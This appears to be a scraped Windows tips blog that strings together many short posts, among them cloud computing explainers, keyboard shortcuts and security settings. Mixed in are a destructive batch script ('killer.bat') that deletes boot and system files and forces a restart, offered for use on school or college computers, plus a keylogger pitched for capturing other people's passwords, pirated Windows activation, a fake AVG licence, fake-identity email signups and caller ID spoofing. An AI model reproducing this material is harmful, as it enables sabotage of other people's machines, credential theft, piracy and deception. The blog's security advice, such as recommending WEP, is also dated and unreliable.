Genuine your Windows for latest update

0 comments
Today,i am going to tell you how to genuine your unregistered windows OS,by which you found the latest update from Microsoft and enhance the security and other features of the Windows.
This work for the Windows Vista and 7 .
For download the tool click here
Open the tool you see a window like given below...

Click on the 'Select Task' and you see the new window like given below...

Go to 'Please Select' option and choose your any brand name.
After that Click on the "Activate slic Present" and Wait after some time a new window open just choose anything.
After doing that click on 'Install information 32bit' or 'Install information 64bit' according to your operating system.
Now click 'Hazar option 2' after some time a option come for restart your computer ,then reboot your system.
Go to MyComputer property and check,your OS done genuine.

What is Cloud Computing?

0 comments
What cloud computing really means

Cloud computing comes into focus only when you think about what IT always needs: a way to increase capacity or add capabilities on the fly without investing in new infrastructure, training new personnel, or licensing new software. Cloud computing encompasses any subscription-based or pay-per-use service that, in real time over the Internet, extends IT’s existing capabilities.

Cloud computing is at an early stage, with a motley crew of providers large and small delivering a slew of cloud-based services, from full-blown applications to storage services to spam filtering. Yes, utility-style infrastructure providers are part of the mix, but so are SaaS (software as a service) providers such as Salesforce.com. Today, for the most part, IT must plug into cloud-based services individually, but cloud computing aggregators and integrators are already emerging.

InfoWorld talked to dozens of vendors, analysts, and IT customers to tease out the various components of cloud computing. Based on those discussions, here’s a rough breakdown of what cloud computing is all about:

1. SaaS
This type of cloud computing delivers a single application through the browser to thousands of customers using a multitenant architecture. On the customer side, it means no upfront investment in servers or software licensing; on the provider side, with just one app to maintain, costs are low compared to conventional hosting. Salesforce.com is by far the best-known example among enterprise applications, but SaaS is also common for HR apps and has even worked its way up the food chain to ERP, with players such as Workday. And who could have predicted the sudden rise of SaaS ”desktop” applications, such as Google Apps and Zoho Office?

2. Utility computing
The idea is not new, but this form of cloud computing is getting new life from Amazon.com, Sun, IBM, and others who now offer storage and virtual servers that IT can access on demand. Early enterprise adopters mainly use utility computing for supplemental, non-mission-critical needs, but one day, they may replace parts of the datacenter. Other providers offer solutions that help IT create virtual datacenters from commodity servers, such as 3Tera’s AppLogic and Cohesive Flexible Technologies’ Elastic Server on Demand. Liquid Computing’s LiquidQ offers similar capabilities, enabling IT to stitch together memory, I/O, storage, and computational capacity as a virtualized resource pool available over the network.

3. Web services in the cloud
Closely related to SaaS, Web service providers offer APIs that enable developers to exploit functionality over the Internet, rather than delivering full-blown applications. They range from providers offering discrete business services — such as Strike Iron and Xignite — to the full range of APIs offered by Google Maps, ADP payroll processing, the U.S. Postal Service, Bloomberg, and even conventional credit card processing services.

4. Platform as a service
Another SaaS variation, this form of cloud computing delivers development environments as a service. You build your own applications that run on the provider’s infrastructure and are delivered to your users via the Internet from the provider’s servers. Like Legos, these services are constrained by the vendor’s design and capabilities, so you don’t get complete freedom, but you do get predictability and pre-integration. Prime examples include Salesforce.com’s Force.com,Coghead and the new Google App Engine. For extremely lightweight development, cloud-basedmashup platforms abound, such as Yahoo Pipes or Dapper.net.

5. MSP (managed service providers)
One of the oldest forms of cloud computing, a managed service is basically an application exposed to IT rather than to end-users, such as a virus scanning service for e-mail or an application monitoring service (which Mercury, among others, provides). Managed security services delivered by SecureWorks, IBM, and Verizon fall into this category, as do such cloud-based anti-spam services as Postini, recently acquired by Google. Other offerings include desktop management services, such as those offered by CenterBeam or Everdream.

6. Service commerce platforms
A hybrid of SaaS and MSP, this cloud computing service offers a service hub that users interact with. They’re most common in trading environments, such as expense management systems that allow users to order travel or secretarial services from a common platform that then coordinates the service delivery and pricing within the specifications set by the user. Think of it as an automated service bureau. Well-known examples include Rearden Commerce and Ariba.

7. Internet integration
The integration of cloud-based services is in its early days. OpSource, which mainly concerns itself with serving SaaS providers, recently introduced the OpSource Services Bus, which employs in-the-cloud integration technology from a little startup called Boomi. SaaS provider Workday recently acquired another player in this space, CapeClear, an ESB (enterprise service bus) provider that was edging toward b-to-b integration. Way ahead of its time, Grand Central — which wanted to be a universal “bus in the cloud” to connect SaaS providers and provide integrated solutions to customers — flamed out in 2005.



Differences Between Dedicated Server, Cloud Computing and VPS

Many people still do not know or are confused when speaking of the major differences between Cloud Server Hosting, Virtual Private Servers (VPS) and Dedicated Servers. Starting with the most basic, you know what to serve?

Quite simply, all the three technologies are used to store data, host websites and structures of e- mail, besides running various applications and softwares. So if they serve for the same thing because they are different?

Each has a different characteristic, let us understand :

Dedicated Servers

It is a physical machine, usually allocated on a fully equipped data center and is totally dedicated to one customer who requires high reliability and high performance hardware ( processing, memory , etc.)… If the client needs more resources, you must purchase more hardware and manually install or exchange server. Its main advantage is the high performance and flexibility and its disadvantage is the high price and inability to upgrade / downgrade immediately. This is one of the best flexible solution than shared web hosting, as because the owner gets a total control over the hosting environment and every aspects of the dedicated hosting, which includes the selection of operating system, server hardware, etc… Some web hosting providers may provide the server administration for free, but usually, the client has to manage the server administration and management tasks.

Cloud Server Hosting (Cloud Computing)

Already Cloud Server is a fractionation of a number of resources available to multiple servers and storage arrays. Through an intelligent architecture, you can allocate these resources allows scalability without losing performance. Besides the economy and flexibility, there are numerous advantages to this technology.

Virtual Private Servers (VPS)

It is the fractionation of resources from one physical server, this fractionation being allocated to a single client. VPS is an ideal choice for businesses that requires same flexibility, reliability, security, root access, stability, etc… at much affordable rates that a dedicated server offers. In this technology there is no guarantee of processing and in case of hardware failures, client applications that depend on it will also fail, as there is integration servers like the Cloud.

We simplify the concepts so that everyone can understand, of course there are many other details, but overall this is it!
How Cloud Computing Can Be A Better Way | How is Cloud Computing Different than Traditional Applications?

In order for traditional applications to work properly, they require a data center with power, an office, cooling, servers, networks, bandwidth and storage. Even once you’ve met all those requirements, you need a professional to install them, configure them and make sure they’re running as they should. As much time, effort and money that goes into these programs by large businesses, you can only imagine the headache they pose for small businesses or individuals.

Cloud computing will help you run your business better and more efficiently for many reasons. Unlike many traditional business apps, applications that are cloud based can be up and running in a couple of days. Let’s face it – for your business to be efficient, you can’t have a lot of downtime. Cloud computing will also save you money because you don’t have to pay tons of money in employee wages to run your applications as well as many products to keep them running and updated. Any performance or security enhancements and upgrades your cloud based programs need, they’ll get automatically.

Another way you’ll save with cloud computing is by not having to constantly buy software and servers. They don’t take up as much of your IT resources as traditional applications.


Cloud Computing Market Will Reach $16.7 Billion by 2013

As more and more organizations starting to transition their data into the cloud and tap into web-based applications, the global cloud computing market is continuing to grow at high speed.Analyst firm 451 Market Monitor has predicted that it expects the cloud computing marketplace to reach $16.7 billion in revenue by 2013.

According to its report, the large and well-established software-as-a-service (SaaS (News - Alert)) category, cloud computing will grow from revenue of $8.7bn in 2010 to $16.7bn in 2013, registering a compound annual growth rate (CAGR) of 24 percent.

The research firm believes that the core cloud computing market will grow at much more rapid pace as the cloud increasingly becomes a mainstream IT strategy embraced by corporate enterprises and government agencies.

Excluding SaaS revenue, cloud-delivered platform and infrastructure services will grow from $964m in revenue in 2010 to $3.9bn 2013 - a CAGR of 60% - the report said.

The core market includes platform-as-a-service (PaaS) and infrastructure-as-a-service (IaaS) offerings, as well as the cloud-delivered software used to build and manage a cloud environment, which The 451 Group (News - Alert) calls 'software infrastructure as a service' (SIaaS).

Cloud-based storage will play a starring role in cloud growth, accounting for nearly 40 percent of the core cloud pie in 2010. "We view storage as the most fertile sector, and predict that cloud storage will experience the strongest growth in the cloud platforms segment," the report says.

In June, Gartner said worldwide cloud computing services market is poised for strong growth and its revenue might reach USD 148.8 billion by 2014.

Last month, another market analyst firm Renub Research had predicted that global cloud computing market might cross $25 billion by the end of 2013.

MY IDEAS: I think we can also develop cloud processing units. In which we will have a super computer in a place and the users of it will only need to have a high really high speed internet and a small processor which only need to interact a software ( browser like) that would take the info from the user send it to super computer and present the output info to the user. This idea would be cost-efficient when people will have to buy expensive computers processors and graphic cards but only the would have to buy a 5 dollar processor and every thing will be done by the supercomputer in backend. My ideas about the payments is that a person will pay for the number of MBs that the supercomputer processed

Security Software That Can Detect And Kill Hidden Trojan Virus And Keylogger

0 comments
In your system some times many harm full program run like keylogger ,virus and trojan which are hidden and you do not capable to remove it, So today i am going to introduce you with a software which remove all the hidden harm full program from your system and increase the security of your computer system.



Process Revealer

This software launch by LOGIXOFT. Process Revealer is a free security software that can detect and kill hidden processes.
Process Revealer Free Edition is a free hidden process detector that reveals what does not appear in standard detection utilities like Windows Task Manager. Process Revealer provides detailed information about each process running on your computer to help you know if a process is related to a malicious program. Hidden programs are automatically highlighted in the interface and can be removed in one click.

For Download Process Revealer Click Here

Make AVG Antivirus 2011 License

0 comments
AVG Anti-virus is a good software which that protect your system by virus,malware and spam.
You download this anti-virus from here

And instal it.




But you see this Anti-virus is a trial virson and allow you for use only 1 month .For making it license version ,we given you a serial number by which you register your trail version and valid it upto 2018. Serial number given below...

Check Your AntiVirus Is Working ?

0 comments
Today,I am tell about a common method by which you check that your antivirus work properly or not.




Open Notepad and copy the Code given below.

X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*

It is a standard text developed by the European Institute for Computer Anti-virus Research (EICAR). Every Anti-Virus is programmed to load this file as a virus.

Save as this file by checkantivirus.com

It is not necessary you save this file by given name but use only this extension..
.com

After some seconds saving this file, your Anti-Virus should come with the message that this file is infected with virus asking permission for its deletion/clean.

This file is secure and it is not going to any infect in your system.

If your antivirus remove this file then it is doing work properly otherwise you update your antivirus.

KEYLOGGER-FOR SAVE KEYBOARD ACTIVITIES

0 comments
Keylogger is a very usef full software to store your keyboard activities.

Keylogger saves all activities which are done by you and anyother on your desktop,if any person open his account then you can get his account number and password and also spy the other person activities on your computer system.






Today in market Keylogger also available in form of hardware like Pen Drive.


For download keylogger go to www.download.com and search for Keylogger and download it......

And install it.


I am a KILLER

0 comments
I am going to tell you how you make a undetectable Batch Virus which delete the important file of your Operating System.
Batch program is a feature of Windows Operating System.Batch programing is a text on notepad which works as a Command in the Windows Operating System.
1: Open notepad and copy paste below write lines...
del boot
del autoexec.bat
del bootmgr
del config.sys
del pagefile.sys
shutdown -r -c "you had been infected by me you go to dad!!!!"
2: Save as by killer.bat
3: Do not run this virus on your system,copy paste and use in collage or school system.

How to Turn Off AutoPlay Feature in Windows 7

0 comments
Autoplay is the feature in Windows operating systems which lets you decide what application to use when you insert a media or device (USB or CD, CD, DVD etc.) to your computer. It also lets you set a default action for certain devices or medias.




It is good feature of Win7 but some time it come with problem.A virus with 'autorun' in the pen drive is too harmfull ,WHY?,when you insert a pen drive (also contain virus) then autoplay come with it when you insert the pen drive, autorun file of virus also start doing work and virus come on your system before you doing scan on the pen drive.For stop it,it is necessary to turn off the autoplay option for security purpose.For turn off the autoplay follow step given below...

  1. Click Start.
  2. In the Search field, type gpedit.msc and press Enter.
  3. The Local Policy Group Editor should appear on your screen.
  4. On the left pane go to Computer ConfigurationAdministrative TemplatesWindows Components and click AutoPlay Policies.
  5. On the right pane, click Turn Off Autoplay.
  6. Select Enabled and under Options, select where you want to turn off AutoPlay. (All drives or CD-ROM and removable media drives.)
  7. Click OK for the changes to take effect.

Hide Windows Partition Without Software

0 comments
I am going tell a trick by which you hide your Windows hard disk partition without any use of software.
For this trick I am use the MS DOS (Command Prompt).Microsoft make the MS DOS for Command Line Instruction.I think every person whose that use the Windows know very well about Command Prompt.
If we say about hackers,Windows registry(regedit) and MS DOS always favourite features in Windows.
So.I am again use the MS DOS for hide the Windows Drive .
1: Go to 'RUN' and type 'cmd' by which command prompt open. Type 'Diskpart' and press ENTER key like given below...
By doing it Diskpart come into Global Configuration Mode.
2: Type 'list volume' like given below...

By this you see all present partion of the Windows.
3:Type 'select volume _' in blank space you fill the partion drive alphabet which you want hide.For example i am choose the partion 'E' like given below...

You see a astrix in front of choose partion which means your selection lock.
4: Type 'remove letter _' fill the blank space with selected partion alphabet,In my case i am write 'E' like given below picture...

After press Enter Key you see message of successfully remove drive, given next command
'list volume' and it shown the hide partion like above picture.You go to MyComputer and see the hide drive.
5: For found the hide partion type 'assign letter _' in place of blank type the choose partition alphabat and press Enter Key,in my case i am write 'E' like given below...


Go to MyComputer and see again.

8 More Important Security Enhancements

0 comments
1. Check Windows Update and Office Update regularly (http://office.microsoft.com/productupdates); Click on the Automatic Updates tab in the System control panel and choose the appropriate options.
2. Install a personal firewall. Both SyGate (www.sygate.com) and ZoneAlarm (www.zonelabs.com) offer free versions.
3. Install a free spyware blocker. I am choose SpyBot Search & Destroy (http://security.kolla.de). SpyBot is also paranoid and ruthless in hunting out tracking cookies.
4. Block pop-up spam messages by disabling the Windows Messenger service.
Open Control Panel >> Administrative Tools >> Services and you'll see Messenger
Right-click and go to Properties, Set Start-up Type to Disabled and press the Stop button. Bye spam pop-ups!
5. Use strong passwords and change them periodically. Passwords should have at least seven characters; use letters and numbers and have at least one symbol.

6. If you're using Outlook or Outlook Express, use the current version or one with the Outlook Security Update installed. The update and current versions patch numerous vulnerabilities.
7. Buy antivirus software and keep it up to date. If you're not willing to pay, try AVG Free Edition
8. If you have a wireless network, turn on the security features: Use MAC filtering, turn off SSID broadcast, and even use WEP with the biggest key you can get.

Windows Shortcut Key

0 comments




Here are some windoes shortcut keys


Alt + E — Opens the Edit menu
Alt + Enter — Opens the Properties window
Alt + F — Opens the File menu
Alt + F4 — Closes the current program
Alt + Print — Screen Takes a screen shot of the current window or program
Alt + Tab — Switches between the programs currently in use
CTRL+TAB — SWITCHES BETWEEN TAB IN DIALOG BOX,I.E 7
Ctrl + A — Selects all text
Ctrl + C — Copies the selected object
Ctrl + End — Jumps to the end of the current document
Ctrl + Esc — Opens the Start menu
Ctrl + F4 — Closes the current program
Ctrl + Home — Jumps to the beginning of the current document
Ctrl + Insert — Copies the selected object

Ctrl + left arrow — Moves to the left one word
Ctrl + right arrow — Moves to the right one word
Ctrl + V — Pastes the selected object
Ctrl + X — Cuts the selected object
Ctrl + the “+”key — Perfectly resizes the width of Explorer columns
End — Jumps to the end of the current line
F1 — Opens the Help menu
F2 — Renames the selected icon
F3 — Launches the Search Companion in a folder or on the
desktop

F4 — Accesses the Address Bar in a folder or window
F5 — Refreshes the contents of a folder or window
Home — Jumps to the beginning of the current line
Shift + Delete — Permanently deletes files (bypasses the Recycle Bin)
Shift + End — Highlights text from the current position to the end of
the line
Shift + F10 — Substitutes for a right-click
Shift + Home — Highlights text from the current position to the
beginning of the line
Shift + Insert — Pastes the selected object
Shift while inserting — Prevents the CD player from playing an audio CD

Shortcuts for Keyboards with a “Windows”Key (Resembling a Flag)

Windows Key + E — Opens Windows Explorer
Windows Key + F — Launches the Windows Search Companion
Windows Key + F1 — Opens the Help and Support Center
Windows Key + L — Locks down Windows
Windows Key + M — Minimizes all windows and shows the desktop
Windows Key + M + Shift — Undoes the minimize
Windows Key + Opens — the System Properties window
Pause/Break key
Windows Key + R — Opens the Run window
Windows Key + U — Launches the Utility Manager
WINDOWS KEY+U — MINIMIZES ALL WINDOWS AND GOES TO DESKTOP

Data Execution Prevention-Security Feature of Windows

0 comments
Data Execution Prevention (DEP) is a security feature that helps prevent damage from viruses and other security threats by monitoring your programs to make sure they use system memory safely.
If you choose to protect all programs, you can still turn off DEP for individual programs.
If you suspect that a program does not run correctly when DEP is turned on, check for a DEP-compatible version of the program or an update from the software publisher
before you change any DEP settings.
  1. Click to open System.(Where your system information given)
  2. Click Advanced System Settings.
    Administrator permission required If you are prompted for an administrator password or confirmation,
    type the password or provide confirmation.
  3. Under Performance, click Settings.
  4. Click the Data Execution Prevention tab, and then click Turn on DEP for
    all programs and services except those I select.

Open website without use of Browser

0 comments
Today, I am going to introduse a new trick, how we can open a website without any use of browser.Yes with out any browser.HOW?


For this Internet connection must.

Method 1:

Click on the 'Start' button and click on the 'Search' option. After click the button a search window open, go to address bar and write the address of the website which you want to open and press the ENTER Key. Your site will open.

Method 2:

Open the 'My Computer' and go to address bar and write the address of site and follow the steps of Method 1.

Enjoy guys!!!

Send unlimited fake Email by 100+ subdomain email address

0 comments
Today,i am going tell you how you send unlimited email by different sub domain name.

Sub domain like...
myself.com
engineer.com
doctor.com
linuxmail.org
contractor.net
usa.com
asia.com
bikerider.com
cash4u.com
cyberservice.com
programmer.net
tech-center.com
solution4u.net
computer4u.com
cyberdude.net
and more than 100+
But remember when you Signup then enter fake country name and do not enter any Contact Email address.
Click Here
If u like it write your view below box.

To print your graphical output from C program

0 comments

first download this software name as DOSBOX.
click this link




1: mount c c:/
2: c:
3: cd tc
4: cd bin
5: tc.exe



run your program only by mouse click press printscreen key to print out your output
whether it is text or animation or graphical.
after that open mspaint and press ctrl+v to paste that object.
and then save it....
enjoy friends..

Call A Number And Call Any Person By Other Person Number

0 comments
Ya! you read correct line, today i am going to tell you a trick by which you call a person with different number and fooling your friend without registration.

Crazy Call is the ultimate tool for making prank calls and fooling your friends.
You can change your CallerID, so when you call someone he sees on his Caller ID display the number you selected.
You can also change the pitch of your voice for deep and creepy or high and funny.




  • How is it done:

    Select the country you are calling from, choose the CallerID you want to display and enter the number you want to call.
    Press "Get me a code" and he will provide you with number to call and a code.
  • Call the number
  • Enter the code and he will connect your call to your friend with the CallerID and voice you have selected.

Click here for open the Crazycall.

Related Posts Plugin for WordPress, Blogger...
 

Copyright @ 2013 All Rights Reserved.